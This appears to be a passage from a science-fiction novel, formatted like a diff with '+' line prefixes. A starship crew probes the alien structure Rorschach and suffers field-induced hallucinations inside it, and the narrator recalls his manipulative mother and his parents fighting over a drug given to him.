+Jack stuck out its tongue, a giant mechanical sperm with a myo-optical tail. Its head was a thick-skinned lozenge, at least half ceramic shielding by cross-section; the tiny payload of sensors at its core was rudimentary, but small enough for the whole assembly to thread through the pencil-thin hole the laser had cut. It unspooled down the hole, rimming Rorschach's newly-torn orifice.
+"Dark down there," James observed.
+Bates: "But warm." 281K. Above freezing.
+The endoscope emerged into darkness. Infrared served up a grainy grayscale of a — a tunnel, it looked like, replete with mist and exotic rock formations. The walls curved like honeycomb, like the insides of fossilized intestine. Cul-de-sacs and branches proliferated down the passage. The basic substrate appeared to be a dense pastry of carbon-fiber leaves. Some of the gaps between those layers were barely thick as fingernails; others looked wide enough to stack bodies.
+"Ladies and gentlemen," Szpindel said softly, "The Devil's Baklava."
+I could have sworn I saw something move. I could have sworn it looked familiar.
+The camera died.
+
+
+
+
+
+
+Rorschach
+
+
+
+"Mothers are fonder than fathers of their children because they are more certain they are their own."
+—Aristotle
+
+I couldn't say goodbye to Dad. I didn't even know where he was.
+I didn't want to say goodbye to Helen. I didn't want to go back there. That was the problem: I didn't have to. There was nowhere left in the world where the mountain couldn't simply pick up and move to Mohammed. Heaven was merely a suburb of the global village, and the global village left me no excuse.
+I linked from my own apartment. My new inlays—mission-specific, slid into my head just the week before—shook hands with the noosphere and knocked upon the Pearly Gates. Some tame spirit, more plausible than Saint Peter if no less ethereal, took a message and disappeared.
+And I was inside.
+This was no antechamber, no visiting room. Heaven was not intended for the casual visitor; any paradise in which the flesh-constrained would feel at home would have been intolerably pedestrian to the disembodied souls who lived there. Of course, there was no reason why visitor and resident had to share the same view. I could have pulled any conventional worldview off the shelf if I'd wanted, seen this place rendered in any style I chose. Except for the Ascended themselves, of course. That was one of the perks of the Afterlife: only they got to choose the face we saw.
+But the thing my mother had become had no face, and I was damned if she was going to see me hide behind some mask.
+"Hello, Helen."
+"Siri! What a wonderful surprise!"
+She was an abstraction in an abstraction: an impossible intersection of dozens of bright panes, as if the disassembled tiles of a stained-glass window had each been set aglow and animated. She swirled before me like a school of fish. Her world echoed her body: lights and angles and three-dimensional Escher impossibilities, piled like bright thunderheads. And yet, somehow I would have recognised her anywhere. Heaven was a dream; only upon waking do you realize that the characters you encountered looked nothing like they do in real life.
+There was only one familiar landmark anywhere in the whole sensorium. My mother's heaven smelled of cinnamon.
+I beheld her luminous avatar and imagined the corpus soaking in a tank of nutrients, deep underground. "How are you doing?"
+"Very well. Very well. Of course, it takes a little getting used to, knowing your mind isn't quite yours any more." Heaven didn't just feed the brains of its residents; it fed off them, used the surplus power of idle synapses to run its own infrastructure. "You have to move in here, sooner better than later. You'll never leave."
+"Actually, I am leaving," I said. "We're shipping out tomorrow."
+"Shipping out?"
+"The Kuiper. You know. The Fireflies?"
+"Oh yes. I think I heard something about that. We don't get much news from the outside world, you know."
+"Anyway, just thought I'd call in and say goodbye."
+"I'm glad you did. I've been hoping to see you without, you know."
+"Without what?"
+"You know. Without your father listening in."
+Not again.
+"Dad's in the field, Helen. Interplanetary crisis. You might have heard something."
+"I certainly have. You know, I haven't always been happy about your father's—extended assignments, but maybe it was really a blessing in disguise. The less he was around, the less he could do."
+"Do?"
+"To you." The apparition stilled for a few moments, feigning hesitation. "I've never told you this before, but—no. I shouldn't."
+"Shouldn't what?"
+"Bring up, well, old hurts."
+"What old hurts?" Right on cue. I couldn't help myself, the training went too deep. I always barked on command.
+"Well," she began, "sometimes you'd come back—you were so very young—and your face would be so set and hard, and I'd wonder why are you so angry, little boy? What can someone so young have to be so angry about?"
+"Helen, what are you talking about? Back from where?"
+"Just from the places he'd take you." Something like a shiver passed across her facets. "He was still around back then. He wasn't so important, he was just an accountant with a karate fetish, going on about forensics and game theory and astronomy until he put everyone to sleep."
+I tried to imagine it: my father, the chatterbox. "That doesn't sound like Dad."
+"Well of course not. You were too young to remember, but he was just a little man, then. He still is, really, under all the secret missions and classified briefings. I've never understood why people never saw that. But even back then he liked to—well, it wasn't his fault, I suppose. He had a very difficult childhood, and he never learned to deal with problems like an adult. He, well, he'd throw his weight around, I guess you'd say. Of course I didn't know that before we married. If I had, I—but I made a commitment. I made a commitment, and I never broke it."
+"What, are you saying you were abused?" Back from the places he'd take you. "Are—are you saying I was?"
+"There are all kinds of abuse, Siri. Words can hurt more than bullets, sometimes. And child abandonment—"
+"He didn't abandon me." He left me with you.
+"He abandoned us, Siri. Sometimes for months at a time, and I—and we never knew if he was coming back And he chose to do that to us, Siri. He didn't need that job, there were so many other things he was qualified to do. Things that had been redundant for years."
+I shook my head, incredulous, unable to say it aloud: she hated him because he hadn't had the good grace to grow unnecessary?
+"It's not Dad's fault that planetary security is still an essential service," I said.
+She continued as if she hadn't heard. "Now there was a time when it was unavoidable, when people our age had to work just to make ends meet. But even back then people wanted to spend time with their families. Even if they couldn't afford to. To, to choose to stay working when it isn't even necessary, that's—" She shattered and reassembled at my shoulder. "Yes, Siri. I believe that's a kind of abuse. And if your father had been half as loyal to me as I've been to him all these years..."
+I remembered Jim, the last time I'd seen him: snorting vassopressin under the restless eyes of robot sentries. "I don't think Dad's been disloyal to either of us."
+Helen sighed. "I don't really expect you to understand. I'm not completely stupid, I've seen how it played out. I pretty much had to raise you myself all these years. I always had to play the heavy, always had to be the one to hand out the discipline because your father was off on some secret assignment. And then he'd come home for a week or two and he was the golden-haired boy just because he'd seen fit to drop in. I don't really blame you for that any more than I blame him. Blame doesn't solve anything at this stage. I just thought—well, really, I thought you ought to know. Take it for what it's worth."
+A memory, unbidden: called into Helen's bed when I was nine, her hand stroking my scar, her stale sweet breath stirring against my cheek. You're the man of the house now Siri. We can't count on your father any more. It's just you and me...
+I didn't say anything for a while. Finally: "Didn't it help at all?"
+"What do you mean?"
+I glanced around at all that customized abstraction: internal feedback, lucidly dreamed. "You're omnipotent in here. Desire anything, imagine anything; there it is. I'd thought it would have changed you more."
+Rainbow tiles danced, and forced a laugh. "This isn't enough of a change for you?"
+Not nearly.
+Because Heaven had a catch. No matter how many constructs and avatars Helen built in there, no matter how many empty vessels sang her praises or commiserated over the injustices she'd suffered, when it came right down to it she was only talking to herself. There were other realities over which she had no control, other people who didn't play by her rules—and if they thought of Helen at all, they thought as they damn well pleased.
+She could go the rest of her life without ever meeting any of them. But she knew they were out there, and it drove her crazy. Taking my leave of Heaven, it occurred to me that omnipotent though she was, there was only one way my mother would ever be truly happy in her own personal creation.
+The rest of creation would have to go.
+
+*
+
+"This shouldn't keep happening," Bates said. "The shielding was good."
+The Gang was up across the drum, squaring away something in their tent. Sarasti lurked offstage today, monitoring the proceedings from his quarters. That left me with Bates and Szpindel in the Commons.
+"Maybe against direct EM." Szpindel stretched, stifled a yawn. "Ultrasound boots up magnetic fields through shielding sometimes, in living tissue at least. Any chance something like that could be happening with your electronics?"
+Bates spread her hands. "Who knows? Might as well be black magic and elves down there."
+"Well, it's not a total wash. We can make a few smart guesses, eh?"
+"Such as."
+Szpindel raised one finger. "The layers we cut through couldn't result from any metabolic process I know about. So it's not 'alive', not in the biological sense. Not that that means anything these days," he added, glancing around the belly of our beast.
+"What about life inside the structure?"
+"Anoxic atmosphere. Probably rules out complex multicellular life. Microbes, maybe, although if so I wish to hell they show up in the samples. But anything complex enough to think, let alone build something like that"—a wave at the image in ConSensus—"is gonna need a high-energy metabolism, and that means oxygen."
+"So you think it's empty?"
+"Didn't say that, did I? I know aliens are supposed to be all mysterious and everything, but I still don't see why anyone would build a city-sized wildlife refuge for anaerobic microbes."
+"It's got to be a habitat for something. Why any atmosphere at all, if it's just some kind of terraforming machine?"
+Szpindel pointed up at the Gang's tent. "What Susan said. Atmosphere's still under construction and we get a free ride until the owners show up."
+"Free?"
+"Freeish. And I know we've only seen a fraction of a fraction of what's inside. But something obviously saw us coming. It yelled at us, as I recall. If they're smart and they're hostile, why aren't they shooting?"
+"Maybe they are."
+"If something's hiding down the hall wrecking your robots, it's not frying them any faster than the baseline environment would do anyway."
+"What you call a baseline environment might be an active counterintrusion measure. Why else would a habitat be so uninhabitable?"
+Szpindel rolled his eyes. "Okay, I was wrong. We don't know enough to make a few smart guesses."
+Not that we hadn't tried. Once Jack's sensor head had been irreparably fried, we'd relegated it to surface excavation; it had widened the bore in infinitesimal increments, patiently burning back the edges of our initial peephole until it measured almost a meter across. Meanwhile we'd customized Bates's grunts—shielded them against nuclear reactors and the insides of cyclotrons—and come perigee we'd thrown them at Rorschach like stones chucked into a haunted forest. Each had gone through Jack's portal, unspooling whisker-thin fiberop behind them to pass intelligence through the charged atmosphere.
+They'd sent glimpses, mostly. A few extended vignettes. We'd seen Rorschach's walls move, slow lazy waves of peristalsis rippling along its gut. We'd seen treacly invaginations in progress, painstaking constrictions that would presumably, given time, seal off a passageway. Our grunts had sailed through some quarters, staggered through others where the magnetic ambience threw them off balance. They'd passed through strange throats lined with razor-thin teeth, thousands of triangular blades in parallel rows, helically twisted. They'd edged cautiously around clouds of mist sculpted into abstract fractal shapes, shifting and endlessly recursive, their charged droplets strung along a myriad converging lines of electromagnetic force.
+Ultimately, every one of them had died or disappeared.
+"Any way to increase the shielding?" I wondered.
+Szpindel gave me a look.
+"We've shielded everything except the sensor heads," Bates explained. "If we shield those we're blind."
+"But visible light's harmless enough. What about purely optical li—"
+"We're using optical links, commissar," Szpindel snapped. "And you may have noticed the shit's getting through anyway."
+"But aren't there, you know—" I groped for the word— "bandpass filters? Something that lets visible wavelengths through, cuts out the lethal stuff on both sides?"
+He snorted. "Sure. It's called an atmosphere, and if we'd brought one with us—about fifty times deeper than Earth's— it might block some of that soup down there. Course, Earth also gets a lot of help from its magnetic field, but I'm not betting my life on any EM we set up in that place."
+"If we didn't keep running into these spikes," Bates said. "That's the real problem."
+"Are they random?" I wondered.
+Szpindel's shrug was half shiver. "I don't think anything about that place is random. But who knows? We need more data."
+"Which we're not likely to get," James said, walking around the ceiling to join us, "if our drones keep shorting out."
+The conditional was pure formality. We'd tried playing the odds, sacrificing drone after drone in the hope that one of them would get lucky; survival rates tailed exponentially to zero with distance from base camp. We'd tried shielding the fiberop to reduce aperture leakage; the resulting tethers were stiff and unwieldy, wrapped in so many layers of ferroceramic that we were virtually waving the bots around on the end of a stick. We'd tried cutting the tethers entirely, sending the machines out to explore on their own, squinting against the radiant blizzard and storing their findings for later download; none had returned. We'd tried everything.
+"We can go in ourselves," James said.
+Almost everything.
+"Right," Szpindel replied in a voice that couldn't mean anything but wrong.
+"It's the only way to learn anything useful."
+"Yeah. Like how many seconds it would take your brain to turn into synchrotron soup."
+"Our suits can be shielded."
+"Oh, you mean like Mandy's drones?"
+"I'd really rather you didn't call me that," Bates remarked.
+"The point is, Rorschach kills you whether you're meat or mechanical."
+"My point is that it kills meat differently," James replied. "It takes longer."
+Szpindel shook his head. "You'd be good as dead in fifty minutes. Even shielded. Even in the so-called cool zones."
+"And completely asymptomatic for three hours or more. And even after that it would take days for us to actually die and we'd be back here long before then, and the ship could patch us up just like that. We even know that much, Isaac, it's right there in ConSensus. And if we know it, you know it. So we shouldn't even be having this argument."
+"That's your solution? We saturate ourselves with radiation every thirty hours and then I get to cut out the tumors and stitch everyone's cells back together?"
+"The pods are automatic. You wouldn't have to lift a finger."
+"Not to mention the number those magnetic fields would do on your brain. We'd be hallucinating from the moment we—"
+"Faraday the suits."
+"Ah, so we go in deaf dumb and blind. Good idea."
+"We can let light pass. Infrared—"
+"It's all EM, Suze. Even if we blacked out our helmets completely and used a camera feed, we'd get leakage where the wire went through."
+"Some, yes. But it'd be better than—"
+"Jesus." A tremor sent spittle sailing from the corner of Szpindel's mouth. "Let me talk to Mi—"
+"I've discussed it with the rest of the gang, Isaac. We're all agreed."
+"All agreed? You don't have a working majority in there, Suze. Just because you cut your brain into pieces doesn't mean they each get a vote."
+"I don't see why not. We're each at least as sentient as you are."
+"They're all you. Just partitioned."
+"You don't seem to have any trouble treating Michelle as a separate individual."
+"Michelle's—I mean, yes, you're all very different facets, but there's only one original. Your alters—"
+"Don't call us that." Sascha erupted with a voice cold as LOX. "Ever."
+Szpindel tried to pull back. "I didn't mean—you know I didn't—"
+But Sascha was gone. "What are you saying?" said the softer voice in her wake. "Do you think I'm just, I'm just Mom, play-acting? You think when we're together you're alone with her?"
+"Michelle," Szpindel said miserably. "No. What I think—"
+"Doesn't matter," Sarasti said. "We don't vote here."
+He floated above us, visored and unreadable in the center of the drum. None of us had seen him arrive. He turned slowly on his axis, keeping us in view as we rotated around him.
+"Prepping Scylla. Amanda needs two untethered grunts with precautionary armament. Cams from one to a million Angstroms, shielded tympanics, no autonomous circuitry. Platelet boosters, dimenhydrinate and potassium iodide for everyone by 1350."
+"Everyone?" Bates asked.
+Sarasti nodded. "Window opens four hours twenty-three." He turned back down the spine
+"Not me," I said.
+Sarasti paused.
+"I don't participate in field ops," I reminded him.
+"Now you do."
+"I'm a synthesist." He knew that. Of course he knew, everyone did: you can't observe the system unless you stay outside the system.
+"On Earth you're a synthesist," he said. "In the Kuiper you're a synthesist. Here you're mass. Do what you're told."
+He disappeared.
+"Welcome to the big picture," Bates said softly.
+I looked at her as the rest of the group broke up. "You know I—"
+"We're a long way out, Siri. Can't wait fourteen months for feedback from your bosses, and you know it."
+She leapt from a standing start, arced smoothly through holograms into the weightless core of the drum. But then she stopped herself, as if distracted by some sudden insight. She grabbed a spinal conduit and swung back to face me.
+"You shouldn't sell yourself short," she said. "Or Sarasti either. You're an observer, right? It's a safe bet there's going to be a lot down there worth observing."
+"Thanks," I said. But I already knew why Sarasti was sending me into Rorschach, and there was more to it than observation.
+Three valuable agents in harm's way. A decoy bought one-in-four odds that an enemy would aim somewhere else.
+
+
+
+"The Lord will take control of you. You will dance and shout and become a different person."
+—1 Samuel 10:6
+
+"We were probably fractured during most of our evolution," James once told me, back when we were all still getting acquainted. She tapped her temple. "There's a lot of room up here; a modern brain can run dozens of sentient cores without getting too crowded. And parallel multitasking has obvious survival advantages."
+I nodded. "Ten heads are better than one."
+"Our integration may have actually occurred quite recently. Some experts think we can still revert to multiples under the right circumstances."
+"Well, of course. You're living proof."
+She shook their head. "I'm not talking about physical partitioning. We're the state of the art, certainly, but theoretically surgery isn't even necessary. Simple stress could do something like it, if it was strong enough. If it happened early in childhood."
+"No kidding."
+"Well, in theory," James admitted, and changed into Sascha who said, "Bullshit in theory. There's documented cases as recently as fifty years ago."
+"Really." I resisted the temptation to look it up on my inlays; the unfocused eyes can be a giveaway. "I didn't know."
+"Well it's not like anyone talks about it now. People were fucking barbarians about multicores back then—called it a disorder, treated it like some kind of disease. And their idea of a cure was to keep one of the cores and murder all the others. Not that they called it murder, of course. They called it integration or some shit. That's what people did back then: created other people to suck up all the abuse and torture, then got rid of them when they weren't needed any more."
+It hadn't been the tone most of us were looking for at an ice-breaking party. James had gently eased back into the driver's seat and the conversation had steered closer to community standards.
+But I hadn't heard any of the Gang use alter to describe each other, then or since. It had seemed innocuous enough when Szpindel had said it. I wondered why they'd taken such offence—and now, floating alone in my tent with a few pre-op minutes to kill, there was no one to see my eyes glaze.
+Alter carried baggage over a century old, ConSensus told me. Sascha was right; there'd been a time when MCC was MPD, a Disorder rather than a Complex, and it had never been induced deliberately. According to the experts of that time, multiple personalities arose spontaneously from unimaginable cauldrons of abuse—fragmentary personae offered up to suffer rapes and beatings while the child behind took to some unknowable sanctuary in the folds of the brain. It was both survival strategy and ritual self-sacrifice: powerless souls hacking themselves to pieces, offering up quivering chunks of self in the desperate hope that the vengeful gods called Mom or Dad might not be insatiable.
+None of it had been real, as it turned out. Or at least, none of it had been confirmed. The experts of the day had been little more than witch doctors dancing through improvised rituals: meandering free-form interviews full of leading questions and nonverbal cues, scavenger hunts through regurgitated childhoods. Sometimes a shot of lithium or haloperidol when the beads and rattles didn't work. The technology to map minds was barely off the ground; the technology to edit them was years away. So the therapists and psychiatrists poked at their victims and invented names for things they didn't understand, and argued over the shrines of Freud and Klein and the old Astrologers. Doing their very best to sound like practitioners of Science.
+Inevitably, it was Science that turned them all into road kill; MPD was a half-forgotten fad even before the advent of synaptic rewiring. But alter was a word from that time, and its resonance had persisted. Among those who remembered the tale, alter was codespeak for betrayal and human sacrifice. Alter meant cannon fodder.
+Imagining the topology of the Gang's coexisting souls, I could see why Sascha embraced the mythology. I could see why Susan let her. After all, there was nothing implausible about the concept; the Gang's very existence proved that much. And when you've been peeled off from a pre-existing entity, sculpted from nonexistence straight into adulthood—a mere fragment of personhood, without even a full-time body to call your own—you can be forgiven a certain amount of anger. Sure you're all equal, all in it together. Sure, no persona is better than any other. Susan's still the only one with a surname.
+Better to direct that resentment at old grudges, real or imagined; less problematic, at least, than taking it out on someone who shares the same flesh.
+I realized something else, too. Surrounded by displays documenting the relentless growth of the leviathan beneath us, I could not only see why Sascha had objected to the word; I could also see why Isaac Szpindel, no doubt unconsciously, had spoken it in the first place.
+As far as Earth was concerned, everyone on Theseus was an alter.
+
+*
+
+Sarasti stayed behind. He hadn't come with a backup.
+There were the rest of us, though, crammed into the shuttle, embedded in custom spacesuits so padded with shielding we might have been deep-sea divers from a previous century. It was a fine balance; too much shielding would have been worse than none at all, would split primary particles into secondary ones, just as lethal and twice as numerous. Sometimes you had to live with moderate exposure; the only alternative was to embed yourself like a bug in lead.
+We launched six hours from perigee. Scylla raced on ahead like an eager child, leaving its parent behind. There was no eagerness in the systems around me, though. Except for one: the Gang of Four almost shimmered behind her faceplate.
+"Excited?" I asked.
+Sascha answered: "Fuckin' right. Field work, Keeton. First contact."
+"What if there's nobody there?" What if there is, and they don't like us?
+"Even better. We get a crack at their signs and cereal boxes without their traffic cops leaning over our shoulders."
+I wondered if she spoke for the others. I was pretty sure she didn't speak for Michelle.
+Scylla's ports had all been sealed. There was no outside view, nothing to see inside but bots and bodies and the tangled silhouette swelling on my helmet HUD. But I could feel the radiation slicing through our armor as if it were tissue paper. I could feel the knotted crests and troughs of Rorschach's magnetic field. I could feel Rorschach itself, drawing nearer: the charred canopy of some firestormed alien forest, more landscape than artefact. I imagined titanic bolts of electricity arcing between its branches. I imagined getting in the way.
+What kind of creatures would choose to live in such a place?
+"You really think we'll get along," I said.
+James' shrug was all but lost under the armor. "Maybe not at first. We may have gotten off on the wrong foot, we might have to sort through all kinds of misunderstandings. But we'll figure each other out eventually."
+Evidently she thought that had answered my question.
+The shuttle slewed; we bumped against each other like tenpins. Thirty seconds of micromaneuvers brought us to a solid stop. A cheery animation played across the HUD in greens and blues: the shuttle's docking seal, easing through the membrane that served as our entrance into Rorschach's inflatable vestibule. Even as a cartoon it looked vaguely pornographic.
+Bates had been prepacked next to the airlock. She slid back the inner door. "Everybody duck."
+Not an easy maneuver, swaddled in life-support and ferroceramic. Helmets tilted and bumped. The grunts, flattened overhead like great lethal cockroaches, hummed to life and disengaged from the ceiling. They scraped past in the narrow headroom, bobbed cryptically to their mistress, and exited stage left.
+Bates closed the inner hatch. The lock cycled, opened again on an empty chamber.
+Everything nominal, according to the board. The drones waited patiently in the vestibule. Nothing had jumped out at them.
+Bates followed them through.
+We had to wait forever for the image. The baud rate was less than a trickle. Words moved back and forth easily enough—"No surprises so far," Bates reported in distorted Jews-harp vibrato—but any picture was worth a million of them, and—
+There: through the eyes of the grunt behind we saw the grunt ahead in motionless, grainy monochrome. It was a postcard from the past: sight turned to sound, thick clumsy vibrations of methane bumping against the hull. It took long seconds for each static-ridden image to accrete on the HUD: grunts descending into the pit; grunts emerging into Rorschach's duodenum; a cryptic, hostile cavescape in systematic increments. Down in the lower left-hand corner of each image, timestamps and Teslas ran down the clock.
+You give up a lot when you don't trust the EM spectrum.
+"Looks good," Bates reported. "Going in."
+In a friendlier universe machines would have cruised the boulevard, sending perfect images in crystal resolution. Szpindel and the Gang would be sipping coffee back in the drum, telling the grunts to take a sample of this or get a close-up of that. In a friendlier universe, I wouldn't even be here.
+Bates appeared in the next postcard, emerging from the fistula. In the next her back was to the camera, apparently panning the perimeter.
+In the one after that she was looking right at us.
+"Oh...okay," she said. "Come on...down..."
+"Not so fast," Szpindel said. "How are you feeling?"
+"Fine. A bit—odd, but..."
+"Odd how?" Radiation sickness announced itself with nausea, but unless we'd seriously erred in our calculations that wouldn't happen for another hour or two. Not until well after we'd all been lethally cooked.
+"Mild disorientation," Bates reported. "It's a bit spooky in here, but—must be Grey Syndrome. It's tolerable."
+I looked at the Gang. The Gang looked at Szpindel. Szpindel shrugged.
+"It's not gonna get any better," Bates said from afar. "The clock is... clock is ticking, people. Get down here."
+We got.
+
+*
+
+Not living, not by a long shot.
+Haunted.
+Even when the walls didn't move, they did: always at the corner of the eye, that sense of crawling motion. Always at the back of the mind the sense of being watched, the dread certainty of malign and alien observers just out of sight. More than once I turned, expecting to catch one of those phantoms in the open. All I ever saw was a half-blind grunt floating down the passageway, or a wide-eyed and jittery crewmate returning my stare. And the walls of some glistening black lava tube with a hundred embedded eyes, all snapped shut just the instant before. Our lights pushed the darkness back perhaps twenty meters in either direction; beyond, mist and shadows seethed. And the sounds—Rorschach creaked around us like some ancient wooden hull trapped in pack ice. Electricity hissed like rattlesnakes.
+You tell yourself it's mostly in your head. You remind yourself it's well-documented, an inevitable consequence of meat and magnetism brought too close together. High-energy fields release the ghosts and the grays from your temporal lobe, dredge up paralyzing dread from the midbrain to saturate the conscious mind. They fuck with your motor nerves and make even dormant inlays sing like fine fragile crystal.
+Energy artefacts. That's all they are. You repeat that to yourself, you repeat it so often it loses any pretense of rationality and devolves into rote incantation, a spell to ward off evil spirits. They're not real, these whispering voices just outside your helmet, those half-seen creatures flickering at the edge of vision. They're tricks of the mind, the same neurological smoke-and-mirrors that convinced people throughout the ages that they were being haunted by ghosts, abducted by aliens, hunted by—
+—vampires—
+—and you wonder whether Sarasti really stayed behind or if he was here all along, waiting for you...
+"Another spike," Bates warned as Tesla and Seiverts surged on my HUD. "Hang on."
+I was installing the Faraday bell. Trying to. It should have been simple enough; I'd already run the main anchor line down from the vestibule to the flaccid sack floating in the middle of the passageway. I was—that's right, something about a spring line. To, to keep the bell centered. The wall glistened in my headlamp like wet clay. Satanic runes sparkled in my imagination.
+I jammed the spring line's pad against the wall. I could have sworn the substrate flinched. I fired my thrust pistol, retreated back to the center of the passage.
+"They're here," James whispered.
+Something was. I could feel it always behind me, no matter where I turned. I could feel some great roaring darkness swirling just out of sight, a ravenous mouth as wide as the tunnel itself. Any moment now it would lunge forward at impossible speed and engulf us all.
+"They're beautiful..." James said. There was no fear in her voice at all. She sounded awestruck.
+"What? Where?" Bates never stopped turning, kept trying to keep the whole three-sixty in sight at once. The drones under her command wobbled restlessly to either side, armored parentheses pointing down the passageway in opposite directions. "What do you see?"
+"Not out there. In here. Everywhere. Can't you see it?"
+"I can't see anything," Szpindel said, his voice shaking.
+"It's in the EM fields," James said. "That's how they communicate. The whole structure is full of language, it's—"
+"I can't see anything," Szpindel repeated. His breath echoed loud and fast over the link. "I'm blind."
+"Shit." Bates swung on Szpindel. "How can that—the radiation—"
+"I d-don't think that's it.."
+Nine Tesla, and the ghosts were everywhere. I smelled asphalt and honeysuckle.
+"Keeton!" Bates called. "You with us?"
+"Y-yeah." Barely. I was back at the bell, my hand on the ripcord. Trying to ignore whatever kept tapping me on the shoulder.
+"Leave that! Get him outside!"
+"No!" Szpindel floated helplessly in the passage, his pistol bouncing against its wrist tether. "No, throw me something."
+"What?"
+It's all in your head. It's all in your—
+"Throw something! Anything!"
+Bates hesitated. "You said you were bli—"
+"Just do it!"
+Bates pulled a spare suit battery off her belt and lobbed it. Szpindel reached, fumbled. The battery slipped from his grasp and bounced off the wall.
+"I'll be okay," he gasped. "Just get me into the tent."
+I yanked the cord. The bell inflated like a great gunmetal marshmallow.
+"Everyone inside!" Bates ran her pistol with one hand, grabbed Szpindel with the other. She handed him off to me and slapped a sensor pod onto the skin of the tent. I pulled back the shielded entrance flap as though pulling a scab from a wound. The single molecule beneath, infinitely long, endlessly folded against itself, swirled and glistened like a soap bubble.
+"Get him in. James! Get down here!"
+I pushed Szpindel through the membrane. It split around him with airtight intimacy, hugged each tiny crack and contour as he passed through.
+"James! Are you—"
+"Get it off me!" Harsh voice, raw and scared and scary, as male as female could sound. Cruncher in control. "Get it off!"
+I looked back. Susan James' body tumbled slowly in the tunnel, grasping its right leg with both hands.
+"James!" Bates sailed over to the other woman. "Keeton! Help out!" She took the Gang by the arm. "Cruncher? What's the problem?"
+"That! You blind?" He wasn't just grasping at the limb, I realized as I joined them. He was tugging at it. He was trying to pull it off.
+Something laughed hysterically, right inside my helmet.
+"Take his arm," Bates told me, taking his right one, trying to pry the fingers from their death grip on the Gang's leg. "Cruncher, let go. Now."
+"Get it off me!"
+"It's your leg, Cruncher." We wrestled our way towards the diving bell.
+"It's not my leg! Just look at it, how could it—it's dead. It's stuck to me..."
+Almost there. "Cruncher, listen," Bates snapped. "Are you with m—"
+"Get it off!"
+We stuffed the Gang into the tent. Bates moved aside as I dove in after them. Amazing, the way she held it together. Somehow she kept the demons at bay, herded us to shelter like a border collie in a thunderstorm. She was—
+She wasn't following us in. She wasn't even there. I turned to see her body floating outside the tent, one gloved hand grasping the edge of the flap; but even under all those layers of Kapton and Chromel and polycarbonate, even behind the distorted half-reflections on her faceplate, I could tell that something was missing. All her surfaces had just disappeared.
+This couldn't be Amanda Bates. The thing before me had no more topology than a mannequin.
+"Amanda?" The Gang gibbered at my back, softly hysteric.
+Szpindel: "What's happening?"
+"I'll stay out here," Bates said. She had no affect whatsoever. "I'm dead anyway."
+"Wha—" Szpindel had lots. "You will be, if you don't—"
+"You leave me here," Bates said. "That's an order."
+She sealed us in.
+
+*
+
+It wasn't the first time, not for me. I'd had invisible fingers poking through my brain before, stirring up the muck, ripping open the scabs. It was far more intense when Rorschach did it to me, but Chelsea was more—
+—precise, I guess you'd say.
+Macramé, she called it: glial jumpstarts, cascade effects, the splice and dice of critical ganglia. While I trafficked in the reading of Human architecture, Chelsea changed it—finding the critical nodes and nudging them just so, dropping a pebble into some trickle at the headwaters of memory and watching the ripples build to a great rolling cascade deep in the downstream psyche. She could hotwire happiness in the time it took to fix a sandwich, reconcile you with your whole childhood in the course of a lunch hour or three.
+Like so many other domains of human invention, this one had learned to run without her. Human nature was becoming an assembly-line edit, Humanity itself increasingly relegated from Production to product. Still. For me, Chelsea's skill set recast a strange old world in an entirely new light: the cut-and-paste of minds not for the greater good of some abstract society, but for the simple selfish wants of the individual.
+"Let me give you the gift of happiness," she said.
+"I'm already pretty happy."
+"I'll make you happier. A TAT, on me."
+"Tat?"
+"Transient Attitudinal Tweak. I've still got privileges at Sax."
+"I've been tweaked plenty. Change one more synapse and I might turn into someone else."
+"That's ridiculous and you know it. Or every experience you had would turn you into a different person."
+I thought about that. "Maybe it does."
+But she wouldn't let it go, and even the strongest anti-happiness argument was bound to be an uphill proposition; so one afternoon Chelsea fished around in her cupboards and dredged up a hair-net studded with greasy gray washers. The net was a superconducting spiderweb, fine as mist, that mapped the fields of merest thought. The washers were ceramic magnets that bathed the brain in fields of their own. Chelsea's inlays linked to a base station that played with the interference patterns between the two.
+"They used to need a machine the size of a bathroom just to house the magnets." She laid me back on the couch and stretched the mesh across my skull. "That's the only outright miracle you get with a portable setup like this. We can find hot spots, and we can even zap 'em if they need zapping, but TMS effects fade after a while. We'll have to go to a clinic for anything permanent."
+"So we're fishing for what, exactly? Repressed memories?"
+"No such thing." She grinned in toothy reassurance. "There are only memories we choose to ignore, or kinda think around, if you know what I mean."
+"I thought this was the gift of happiness. Why—"
+She laid a fingertip across my lips. "Believe it or not, Cyggers, people sometimes choose to ignore even good memories. Like, say, if they enjoyed something they didn't think they should. Or—" she kissed my forehead— "if they don't think they deserve to be happy."
+"So we're going for—"
+"Potluck. You can never tell 'til you get a bite. Close your eyes."
+A soft hum started up somewhere between my ears. Chelsea's voice led me on through the darkness. "Now keep in mind, memories aren't historical archives. They're—improvisations, really. A lot of the stuff you associate with a particular event might be factually wrong, no matter how clearly you remember it. The brain has a funny habit of building composites. Inserting details after the fact. But that's not to say your memories aren't true, okay? They're an honest reflection of how you saw the world, and every one of them went into shaping how you see it. But they're not photographs. More like impressionist paintings. Okay?"
+"Okay."
+"Ah," she said. "There's something."
+"What?"
+"Functional cluster. Getting a lot of low-level use but not enough to intrude into conscious awareness. Let's just see what happens when we—"
+And I was ten years old, and I was home early and I'd just let myself into the kitchen and the smell of burned butter and garlic hung in the air. Dad and Helen were fighting in the next room. The flip-top on our kitchen-catcher had been left up, which was sometimes enough to get Helen going all by itself. But they were fighting about something else; Helen only wanted what was best for all of us but Dad said there were limits and this was not the way to go about it. And Helen said you don't know what it's like you hardly ever even see him and then I knew they were fighting about me. Which in and of itself was nothing unusual.
+What really scared me was that for the first time ever, Dad was fighting back.
+"You do not force something like that onto someone. Especially without their knowledge." My father never shouted—his voice was as low and level as ever—but it was colder than I'd ever heard, and hard as iron.
+"That's just garbage," Helen said. "Parents always make decisions for their children, in their best interests, especially when it comes to medical iss—"
+"This is not a medical issue." This time my father's voice did rise. "It's—"
+"Not a medical issue! That's a new height of denial even for you! They cut out half his brain in case you missed it! Do you think he can recover from that without help? Is that more of your father's tough love shining through? Why not just deny him food and water while you're at it!"
+"If mu-ops were called for they'd have been prescribed."
+I felt my face scrunching at the unfamiliar word. Something small and white beckoned from the open garbage pail.
+"Jim, be reasonable. He's so distant, he barely even talks to me."
+"They said it would take time."
+"But two years! There's nothing wrong with helping nature along a little, we're not even talking black market. It's over-the-counter, for God's sake!"
+"That's not the point."
+An empty pill bottle. That's what one of them had thrown out, before forgetting to close the lid. I salvaged it from the kitchen discards and sounded out the label in my head.
+"Maybe the point should be that someone who's barely home three months of the year has got his bloody nerve passing judgment on my parenting skills. If you want a say in how he's raised, then you can damn well pay some dues first. Until then, just fuck right off."
+"You will not put that shit into my son ever again," my father said.
+
+Bondfast™ Formula IV
